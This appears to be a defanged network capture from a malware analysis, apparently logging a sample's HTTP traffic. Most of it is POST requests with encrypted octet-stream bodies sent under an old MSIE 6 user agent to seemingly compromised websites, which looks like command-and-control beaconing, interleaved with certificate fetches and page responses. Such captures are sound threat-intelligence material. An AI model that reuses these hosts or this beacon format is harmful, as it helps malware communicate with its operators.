Date: Sat, 01 Jul 2017 11:17:04 GMT
Server: Apache/2.4.20
Last-Modified: Fri, 07 Oct 2016 10:45:25 GMT
ETag: "328-53e441b94fb40"
Accept-Ranges: bytes
Content-Length: 808
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<html>..<head>.  .<meta charset="utf-8">...<title
>Audio Direkt GmbH</title>. <style>. * {.
padding:0;. margin:0;. color: #0F2443;. font-fa
mily: sans-serif;. }. . </style>..</head>..
..<body>. .<img src="bild.png" style="width:100%; max-width:
100%;">. .. .<br><br><small><center>...&l
t;br>..Audio Direkt GmbH<br>..Eichenweg 8<br>..D-58239
Schwerte (Ruhr)<br>..<br>..Telefon:<br>..Tel : 49 2
304 / 254826-0<br>..Fax : 49 2304 / 254826-7<br>..<br&
gt;..E-Mail:<br>..info@audiodirekt.com<br>..<br>..Ge
sch..ftsf..hrer:<br>..Pedro J. Garcia<br>..<br>..USt
-IdNr.:<br>..DE273807665<br>..<br>..Registergericht
Hagen<br>..HRB 8585<br>..<br>..Inhaltlich Verantwort
licher gem. .. 6 MDStV:<br>..Pedro Garcia, info@audiodirekt.com
.. .</center>. .</small>..</body>.</html>.HT
TP/1.1 200 OK..Date: Sat, 01 Jul 2017 11:17:04 GMT..Server: Apache/2.4
.20..Last-Modified: Fri, 07 Oct 2016 10:45:25 GMT..ETag: "328-53e441b9
4fb40"..Accept-Ranges: bytes..Content-Length: 808..Keep-Alive: timeout
=5, max=100..Connection: Keep-Alive..Content-Type: text/html..<html
>..<head>. .<meta charset="utf-8">...<title>Audi
o Direkt GmbH</title>. <style>. * {. paddin
g:0;. margin:0;. color: #0F2443;. font-family

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: pixemia.com
Connection: Keep-Alive
Cache-Control: no-cache

r/PNUkvJyXQU8Yxsog41ObT9RKqRZX9Yr6darch ajVA7G5YMEDbBtvGvN0Spc z4P CAKKNUIhmNU3LWds Z49xgiINzrJcOTUhCb/HsIunQERFiOLLSnyNC8qLXJgROBL7os8dgiTuONYwhh52pnZPgW1WSGv2DqSm80wFB3XDPyxkuxtcmZkV7LVm TS0FycH9ZRm6xaNiz2Zx/8pvl9C RQtMR/vfZlPIG5STKkh1/L03XnRN84TYINwy2sIdRnZpAYT6oSmVyDmXOwehR5I5puPGCfw7WvqjtKcNqG/2I41 E8LmY/0RyLwtLwpi6zdLM/hb8A0zAb8SKVbEEHOLPCxQWMZlID7o4ra OndsR9y8uuFfmfHBs20SzeiQB0wUb8uzyeWLlq3ir4BOS7VAOZsPTlbLmp77r4wVT EfUM1ePqHmIFg4tKUxpejTIAhx7ls Yh8l3NOCUogtlNgAiokhQYA606oxx7oJAsbmBXIYg==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:04 GMT
Server: Apache
Last-Modified: Tue, 14 Jun 2016 11:24:51 GMT
ETag: "6874-5353b40ea6785"
Accept-Ranges: bytes
Content-Length: 26740
Vary: Accept-Encoding
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"."htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xml
ns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<title>Jorg
e Mora Beneyto | Comercio Internacional</title>...<meta http-
equiv="content-type" content="text/html;charset=UTF-8" />..<meta
name="viewport" content="width=970,user-scalable=yes" />...<lin
k rel="stylesheet" type="text/css" media="all" href="css/style.css" /&
gt;...<!-- Including Puritan font from Google Web Fonts -->..<
;link href="hXXp://fonts.googleapis.com/css?family=Puritan:regular,it
alic,bold,bolditalic" rel="stylesheet" type="text/css" />...<!--
Including jQuery, Form and Form Validation Plugins -->..<script
src="hXXp://code.jquery.com/jquery-latest.js" type="text/javascript"&
gt;</script>..<script src="lib/js/jquery.form.js" type="text/
javascript"></script>..<script src="lib/js/jquery.validate
.min.js" type="text/javascript"></script>...<!-- Contact F
orm validation settings -->..<script src="lib/js/jquery.custom.c
ontact.validation.js" type="text/javascript"></script>...<
!-- Custom functions -->..<script src="lib/js/jquery.custom.mini
malme.js" type="text/javascript"></script>...<!-- Includin
g & Initializing tipsy (nicer tooltips) -->..<link rel="styleshe
et" type="text/css" href="lib/js/tipsy/stylesheets/tipsy.css" />..&
lt;script type="text/javascript" src="lib/js/tipsy/javascripts/jqu

<<< skipped >>>

POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 436
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: pixemia.com
Connection: Keep-Alive
Cache-Control: no-cache

bxI0iXUPDnXN1jyQ3Fq7Sm5rvn8D4PPieQMvEz k325B7f9aGxz/wfYw3fHZ/fyVNhTh5p0dViOY26geiLEWHt32QCBD9zhPzfmdyVKg9Tp0LlrAmPNNIh8o0dtuhbX0VpgFPkDIn7O9/YEOD9p0 zKgGWgjSI9yA3L6WXpJwnTQYCvBrTfxHBjlyx7G/SK5y6kPBFrb9BQ3JkSqwoTGSiBkc78YpNkOmKMfDyEtWKyEc8/4K/U3OmkeTjmGjphz KOV/6BVI0LqNVouYNCrnLx/NkFVjLALAU2KfI3ItoO7ZqSn7Yj5YDofYZTRgq40bVVF6olJRpj1 34 UA1m8SK9eNczYF0ZJhOkCQYM TOgumAgoCHhTk8yjpUqBrs5b8ejdKQQyWg27r/wJNlP6A/KnOegjPx0z2uP7j1r1S3DrVrD1w==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:05 GMT
Server: Apache
Last-Modified: Tue, 14 Jun 2016 11:24:51 GMT
ETag: "6874-5353b40ea6785"
Accept-Ranges: bytes
Content-Length: 26740
Vary: Accept-Encoding
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"."htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xml
ns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<title>Jorg
e Mora Beneyto | Comercio Internacional</title>...<meta http-
equiv="content-type" content="text/html;charset=UTF-8" />..<meta
name="viewport" content="width=970,user-scalable=yes" />...<lin
k rel="stylesheet" type="text/css" media="all" href="css/style.css" /&
gt;...<!-- Including Puritan font from Google Web Fonts -->..<
;link href="hXXp://fonts.googleapis.com/css?family=Puritan:regular,it
alic,bold,bolditalic" rel="stylesheet" type="text/css" />...<!--
Including jQuery, Form and Form Validation Plugins -->..<script
src="hXXp://code.jquery.com/jquery-latest.js" type="text/javascript"&
gt;</script>..<script src="lib/js/jquery.form.js" type="text/
javascript"></script>..<script src="lib/js/jquery.validate
.min.js" type="text/javascript"></script>...<!-- Contact F
orm validation settings -->..<script src="lib/js/jquery.custom.c
ontact.validation.js" type="text/javascript"></script>...<
!-- Custom functions -->..<script src="lib/js/jquery.custom.mini
malme.js" type="text/javascript"></script>...<!-- Includin
g & Initializing tipsy (nicer tooltips) -->..<link rel="styleshe
et" type="text/css" href="lib/js/tipsy/stylesheets/tipsy.css" />..&
lt;script type="text/javascript" src="lib/js/tipsy/javascripts/jqu

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: miltinio-teatras.lt
Connection: Keep-Alive
Cache-Control: no-cache

U0Q5/y5mFouTn3N5OXfGM5En4qGuU/I6QhGakhQDkKhBQKoLrIdac8AIGwu9iljKdqk5vdGzRUHYC T89II0FJPds/0vHUg5yCgj9 oFKUBWehlPUy1vZzCQCOMYvpiyKe1qoVWVDCiOMWS4C8m481loZN2xI3BauOmvnSDzUy8mbc7x OA0CDb0ptwySzkVflfNVoQSm4nJNzLmOZzq/nEqPHfuSF6/wcHgUvwxdPqLbFc2EunaFFtG6XgoCPjdDWEyXmOx4LVzCljg8W2ocsATtikkkSjI ky7h8iDafOCV5Tansx2Iil27fzf13FvI5QVaas74PuXtUGoOrQyM7Im8h/mkLIkfwj2OplINB8e1mM 43MvGXgdXJJCX6SjUncXCTAniaFy2bNjna5F2p0z80Bo K sUr8nzU9ugoENtOgT9pI8YY/aOx2yt LUGMBINoexLrjma8OMc9eOZbj5R295LiBTPuvNUR3gIwCpk7M8Kam2drdmpHpV3Jk=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:31 GMT
Server: Apache
X-Powered-By: PHP/5.5.38
Link: <hXXp://miltinio-teatras.lt/wp-json/>; rel="hXXps://api.w.org/"
Link: <hXXp://miltinio-teatras.lt/>; rel=shortlink
X-TEC-API-VERSION: v1
X-TEC-API-ROOT: hXXp://miltinio-teatras.lt/wp-json/tribe/events/v1/
X-TEC-API-ORIGIN: hXXp://miltinio-teatras.lt
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
203e..<!DOCTYPE html>.<html class="" lang="lt-LT" prefix="og:
hXXp://ogp.me/ns# fb: hXXp://ogp.me/ns/fb#">.<head>..<met
a http-equiv="X-UA-Compatible" content="IE=edge" />...<meta http
-equiv="Content-Type" content="text/html; charset=utf-8"/>.....<
meta name="viewport" content="width=device-width, initial-scale=1" /&g
t;..<title>Juozo Miltinio dramos teatras</title>.<link
rel='dns-prefetch' href='//fonts.googleapis.com' />.<link rel='d
ns-prefetch' href='//s.w.org' />.<link rel="alternate" type="app
lication/rss xml" title="Juozo Miltinio dramos teatras » ..ra...
. RSS srautas" href="hXXp://miltinio-teatras.lt/feed/" />.<link
rel="alternate" type="application/rss xml" title="Juozo Miltinio dramo
s teatras » Komentar.. RSS srautas" href="hXXp://miltinio-teatra
s.lt/comments/feed/" />.<link rel="alternate" type="text/calenda
r" title="Juozo Miltinio dramos teatras » iCal tiektuvas" href="
hXXp://miltinio-teatras.lt/renginiai/?ical=1" />....<link rel="s
hortcut icon" href="//miltinio-teatras.lt/wp-content/uploads/2016/12/J
MDT.jpg" type="image/x-icon" />......<!-- For iPhone -->....&
lt;link rel="apple-touch-icon-precomposed" href="//miltinio-teatras.lt
/wp-content/uploads/2016/12/JMDT.jpg">......<!-- For iPad -->
....<link rel="apple-touch-icon-precomposed" sizes="72x72" href="//
miltinio-teatras.lt/wp-content/uploads/2016/12/JMDT.jpg">......<
!-- For iPad Retina display -->....<link rel="apple-touch-ic

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 524
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: shakeyspizza.ph
Connection: Keep-Alive
Cache-Control: no-cache

gVndLqatY32SBeO2QejkRslx1caG7O vOtyVi/RfUG9sOOL2NpFhqdhl9pMJ45LMcLPf7NWRpBblWpvkagsJu uYeodi866FAg7YcvcEsvgnsUpjohubZkmvxNQnqp6KaRPhh/QEdSFvIn NgstL3VuzVEmHfyd99Kcs4E5eNW8AodAFH5aCSv3012vilTIjEfz47Cn5rY 3FQzH7wNstVHE/n1Xfe1FEYQbdQwatikTmTF3baXDlTRrMIUMQ786K F ybYUXrgjo lqBgT5lep7KwJyacc8b7H/QqBaI/OdXbTJO2Y97NV3e8OL8GgnUtsDp9wZxFrF6UeZGvdGCjvNyGvSwx5MMh6j3XbJfeYlNJNGDRVrRGPOcASgteI408PU8lVvZo oVT412ztG2qs5BUAc1x /tefVSwLCtd4lpfsGKEOZd 7gHmE6igO3I49MmNpLu3t5K7kXdmHbsDvPP2OY YSTGNj3FPfRS793shghpQXiPPvV1JtGYko38UTFrqWuL7w=
HTTP/1.1 302 Object moved
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 130
Content-Type: text/html
Expires: Sat, 01 Jul 2017 11:16:18 GMT
Location: index.asp
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAQSACQDR=IGGAJEFDPDCNELLMNGFGHDJF; path=/
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:17:18 GMT
<head><title>Object moved</title></head>.<b
ody><h1>Object Moved</h1>This object may be found <a
HREF="index.asp">here</a>.</body>.
....



GET /index.asp HTTP/1.1

Accept: */*
Accept-Language: en-us
Cookie: ASPSESSIONIDAQSACQDR=IGGAJEFDPDCNELLMNGFGHDJF
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: shakeyspizza.ph
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 21543
Content-Type: text/html
Expires: Sat, 01 Jul 2017 11:16:19 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:17:19 GMT
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html
xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>.. <!-- V2
-->.. <!-- SLIDE SHOW -->.. <link
href="v2references/images/Slider/Themes/2/js-image-slider.css" rel="st
ylesheet" type="text/css" /> .. <script src="v2refer
ences/images/Slider/Themes/2/js-image-slider.js" type="text/javascript
"></script>.. <!-- DONE -->.. <
;link rel="Stylesheet" type="text/css" href="v2references/css/homepage
.css" />.. <link rel="Stylesheet" type="text/css" hre
f="v2references/css/style.css" />.. <!-- Pretty Photo
-->.. <link rel="stylesheet" type="text/css" href="C
SS/prettyPhoto.css" /> .. <script type
="text/javascript" src="js/jquery1.4.js"></script>..
<script type="text/javascript" src="pakage/carousel/lib/jquery.j
carousel.min.js"></script>.. <script type="text
/javascript" src="js/jquery.prettyPhoto.js" charset="utf-8"></sc
ript>.. .. <script type="text/javascript">..
window.onerror = function () {.. retur
n true;.. }.. baseUrl = "";..
jQuery(document).ready(function () {.. jQuery(
'#mycarousel').jcarousel({.. visible: 3..

<<< skipped >>>

GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com


HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 18:26:01 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 19 Oct 2012 20:08:11 GMT
Accept-Ranges: bytes
Content-Length: 893
Cache-control: max-age=86400
Content-Type: application/x-pkcs7-mime
0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D.....'..0
9...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U..
..DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital S
ignature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..
..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.
2....w..{........s.z..2..~..0....*8.y.1.P..e..Qc....a.Ka..Rk...K.(.H..
....>.... .[.*....p....%.tr.{j.4.0...h.{T.....Z...=d......Ap..r.&.8
U9C....\@..........%.......:..n.>..\..<..i....*.)W..=....]......
B0@0...U.......0....0...U...........0...U..........{,q...K.u...`...0..
.*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~
.....K. D.....}..j.....N...:.pI............:^H...X._..Z.......Y..n....
...f3.Y[....sG. ...7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G
..P.......dc`........}...=2.e..|.Wv...(9..e...w.j..w........).....55.1
.HTTP/1.1 200 OK..Date: Fri, 30 Jun 2017 18:26:01 GMT..Server: Apache.
.X-Frame-Options: SAMEORIGIN..X-XSS-Protection: 1; mode=block..Last-Mo
dified: Fri, 19 Oct 2012 20:08:11 GMT..Accept-Ranges: bytes..Content-L
ength: 893..Cache-control: max-age=86400..Content-Type: application/x-
pkcs7-mime..0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.....
..D.....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust
Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U.
...Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H....
.........0............P..W..be......,k0.[...}.@......3vI*.?!I..N..

<<< skipped >>>

GET /roots/dstrootcax3.p7c HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com


HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 18:26:01 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 19 Oct 2012 20:08:11 GMT
Accept-Ranges: bytes
Content-Length: 893
Cache-control: max-age=86400
Content-Type: application/x-pkcs7-mime
0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D.....'..0
9...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U..
..DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital S
ignature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..
..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.
2....w..{........s.z..2..~..0....*8.y.1.P..e..Qc....a.Ka..Rk...K.(.H..
....>.... .[.*....p....%.tr.{j.4.0...h.{T.....Z...=d......Ap..r.&.8
U9C....\@..........%.......:..n.>..\..<..i....*.)W..=....]......
B0@0...U.......0....0...U...........0...U..........{,q...K.u...`...0..
.*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~
.....K. D.....}..j.....N...:.pI............:^H...X._..Z.......Y..n....
...f3.Y[....sG. ...7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G
..P.......dc`........}...=2.e..|.Wv...(9..e...w.j..w........).....55.1
.HTTP/1.1 200 OK..Date: Fri, 30 Jun 2017 18:26:01 GMT..Server: Apache.
.X-Frame-Options: SAMEORIGIN..X-XSS-Protection: 1; mode=block..Last-Mo
dified: Fri, 19 Oct 2012 20:08:11 GMT..Accept-Ranges: bytes..Content-L
ength: 893..Cache-control: max-age=86400..Content-Type: application/x-
pkcs7-mime..0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.....
..D.....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust
Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U.
...Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H....
.........0............P..W..be......,k0.[...}.@......3vI*.?!I..N..

<<< skipped >>>

GET /roots/dstrootcax3.p7c HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com


HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 18:26:01 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 19 Oct 2012 20:08:11 GMT
Accept-Ranges: bytes
Content-Length: 893
Cache-control: max-age=86400
Content-Type: application/x-pkcs7-mime
0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D.....'..0
9...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U..
..DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital S
ignature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..
..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.
2....w..{........s.z..2..~..0....*8.y.1.P..e..Qc....a.Ka..Rk...K.(.H..
....>.... .[.*....p....%.tr.{j.4.0...h.{T.....Z...=d......Ap..r.&.8
U9C....\@..........%.......:..n.>..\..<..i....*.)W..=....]......
B0@0...U.......0....0...U...........0...U..........{,q...K.u...`...0..
.*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~
.....K. D.....}..j.....N...:.pI............:^H...X._..Z.......Y..n....
...f3.Y[....sG. ...7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G
..P.......dc`........}...=2.e..|.Wv...(9..e...w.j..w........).....55.1
.HTTP/1.1 200 OK..Date: Fri, 30 Jun 2017 18:26:01 GMT..Server: Apache.
.X-Frame-Options: SAMEORIGIN..X-XSS-Protection: 1; mode=block..Last-Mo
dified: Fri, 19 Oct 2012 20:08:11 GMT..Accept-Ranges: bytes..Content-L
ength: 893..Cache-control: max-age=86400..Content-Type: application/x-
pkcs7-mime..0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.....
..D.....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust
Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U.
...Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H....
.........0............P..W..be......,k0.[...}.@......3vI*.?!I..N..

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: altonhousehotel.com
Connection: Keep-Alive
Cache-Control: no-cache

ha3B4uYWHV  drt7gcF 5AntDjLGLjYSenHSsoUbc 0O7PzNPcRHc UfmTQlP4bwcRdneFDxxAj4OF78wXWSTcDlkMpdAM B2jrSnDjsXTDkY8tUENmZe1bq weBYLNX039bAbIY2Q7NLTlq2m0g9M2qAvS0Ub gc1C6v0Jn6Pv4nEnp6T0y1oAd28GSZO m9oHKnKCy0knWShHZ1hp5ZsEOcK5XIl2TwbQxfK3jGJKNvmav0gt4P8XZTBGCbsOWyRJQkD/t7D54taReYOqT9m8 UOfNy3Kt0o78zJ7awX3wqN4QruXP8V62uRpC71FNRrqSQhGOeTVAdXTESwgOP/H2UuRJ2k0oAJAUPkakXA2pKresSNsYX49o9RaclTFVl9hGZkwWvVQBx9FwN5 dxNtIxhPSozNzp6iWAv8bOc4O9sHioqY0b9yQVSQsdOFNJ27i233YQoJvKKivuRBKq0yWoqkAWXxTOuMd6VB Kjw/4CZqde406Us3MbLxWA2hsb2t
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da6f58b2e53e334d883fd057b51f8900c1498907799; expires=Sun, 01-Jul-18 11:16:39 GMT; path=/; domain=.altonhousehotel.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Link: <hXXps://altonhousehotel.com/wp-json/>; rel="hXXps://api.w.org/", <hXXps://altonhousehotel.com/>; rel=shortlink
Set-Cookie: PHPSESSID=bc3b68ccfd0dd09a7110149c60542d12; path=/
Server: cloudflare-nginx
CF-RAY: 3778f452936a824f-KBP
49..<!DOCTYPE html>.<!--[if IE 6]>.<html id="ie6" lang=
"en-GB">.<![endif]-->...39..<!--[if IE 7]>.<html id=
"ie7" lang="en-GB">.<![endif]-->...66..<!--[if IE 8]>.&
lt;html id="ie8" lang="en-GB">.<![endif]-->.<!--[if !(IE 6
) | !(IE 7) | !(IE 8) ]><!-->...2d..<html lang="en-GB">
;.<!--<![endif]-->.<head>....1a..<meta charset="UTF-
8" />....1.....3.......35..<meta http-equiv="X-UA-Compatible" co
ntent="IE=edge">..3fc2....<link rel="pingback" href="" />....
<!--[if lt IE 9]>..<script src="hXXp://altonhousehotel.com/wp
-content/themes/Divi/js/html5.js" type="text/javascript"></scrip
t>..<![endif]-->...<script type="text/javascript">...do
cument.documentElement.className = 'js';..</script>...<title&
gt;Alton House Hotel | Alton House Hotel quality hotel accommodation a
nd weddings in Alton</title>...<script type="text/javascript"
>...var ajaxurl = 'hXXps://altonhousehotel.com/wp-admin/admin-ajax.
php';...</script>...<link rel='dns-prefetch' href='//VVV.goog
le.com' />.<link rel='dns-prefetch' href='//ajax.googleapis.com'
/>.<link rel='dns-prefetch' href='//fonts.googleapis.com' />
.<link rel='dns-prefetch' href='//s.w.org' />.<link rel="alte
rnate" type="application/rss xml" title="Alton House Hotel » Fee
d" href="hXXps://altonhousehotel.com/feed" />...<script type="te
xt/javascript">....window._wpemojiSettings = {"baseUrl":"https:

<<< skipped >>>

GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69+Aj36pvE8hI6t7jiY7NkyMtQCEQDwHUvue3yjezwFZqwFlyRY HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.comodoca.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:09 GMT
Server: Apache
Last-Modified: Wed, 28 Jun 2017 15:09:48 GMT
Expires: Wed, 05 Jul 2017 15:09:48 GMT
ETag: 5A8D168DA90A92F124A2CF1DE03D7A9B293644E6
Cache-Control: max-age=358958,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp32
Content-Length: 728
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0........~.=...<....8...22...2017
0628150948Z0t0r0J0... ........^..hl\.....W....r.=.....~.=...<....8.
..22......K.{|.{<.f...$X....20170628150948Z....20170705150948Z0...*
.H..............7....AYld...p......W.{.~0.R%....NQ...<|...........!
.F...........K.i@...!h^!........*.....!...0.\..^&....2......@D.^...#?M
..L*./.;..........Y..izg=b IM........Q..Q....j.... .`-.8......@...1.Y.
...I.~.r._.e..@..=.bhI....tM1Vg.. .n...A"W.s..gH'.g.$([.M...z........b
..(....J]5.vq.c..Z.....P....y...N.....vK..........5G8.X......7.h..9..V
=.2t..Bik.....e..HF?..J..'...;vn..y_.H..'.mTE...c......Nv.$.........'.
.j.....7....$J.......@.>"_..... ............{..W..........#S...)..8
...NHQ..P.l..g...=......:...2...Zbb....^vg...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: korta-sa.com
Connection: Keep-Alive
Cache-Control: no-cache

M5 gnaV4K1 f36UmTNHSKx4YdvHzyN0aqS9yn7sZzRJrbY23nmUiUm3wNGnz90xp3YSqvrbzihWuJM3EhDBQk2B2IQzgch549Lvp8N9otOtYT0ABK0J0XZrY1Nk/DfWK02KuqQby7ZUeBfoz8aZmFtTZBStpfKjvye4L67ZGyzTrf8MgMVkJ1to2v6p8txoHC iM/sRTYdMK1teME35GszDrlhHG8zse7wo8t5iZCbxnrR0XZQ6cxFOmUbfTxLHoOTiUYfDiw8Zif/ZRaTHWqjsRbDoMFGp0eousRGPB 9tqox9jbN6MkGFp0jG7CSMnLm84UWEmoVxkLQ2jpeygNfjDcib ssGO1dBUeIfITINK7pgMCAESjjezCbLXDfYDGst4L9v2Np607vbk/w8b32rdumAEOaOWMW87d7u3Cl8pW 8yBGoy1zzcnEZs20adTbSz2X1WKMCCX4fAPjuOST caCSdWWbC3cTa
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 10:51:28 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 280
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.</p>.<hr>.<address>A
pache/2.2.22 (Ubuntu) Server at korta-sa.com Port 80</address>.&
lt;/body></html>...


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.pferd.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: hXXps://VVV.pferd.com/de-de/
Cache-Control: max-age=0
Expires: Sat, 01 Jul 2017 11:16:38 GMT
Content-Length: 291
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXps://VVV.pferd.com/de-de/">here</a>.</p>.<h
r>.<address>Apache/2.4.18 (Ubuntu) Server at VVV.pferd.com Po
rt 80</address>.</body></html>.HTTP/1.1 302 Found..D
ate: Sat, 01 Jul 2017 11:16:38 GMT..Server: Apache/2.4.18 (Ubuntu)..Lo
cation: hXXps://VVV.pferd.com/de-de/..Cache-Control: max-age=0..Expire
s: Sat, 01 Jul 2017 11:16:38 GMT..Content-Length: 291..Keep-Alive: tim
eout=5, max=100..Connection: Keep-Alive..Content-Type: text/html; char
set=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&g
t;.<html><head>.<title>302 Found</title>.</
head><body>.<h1>Found</h1>.<p>The document
has moved <a href="hXXps://VVV.pferd.com/de-de/">here</a>.
</p>.<hr>.<address>Apache/2.4.18 (Ubuntu) Server at
VVV.pferd.com Port 80</address>.</body></html>.t>....



GET / HTTP/1.1

Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
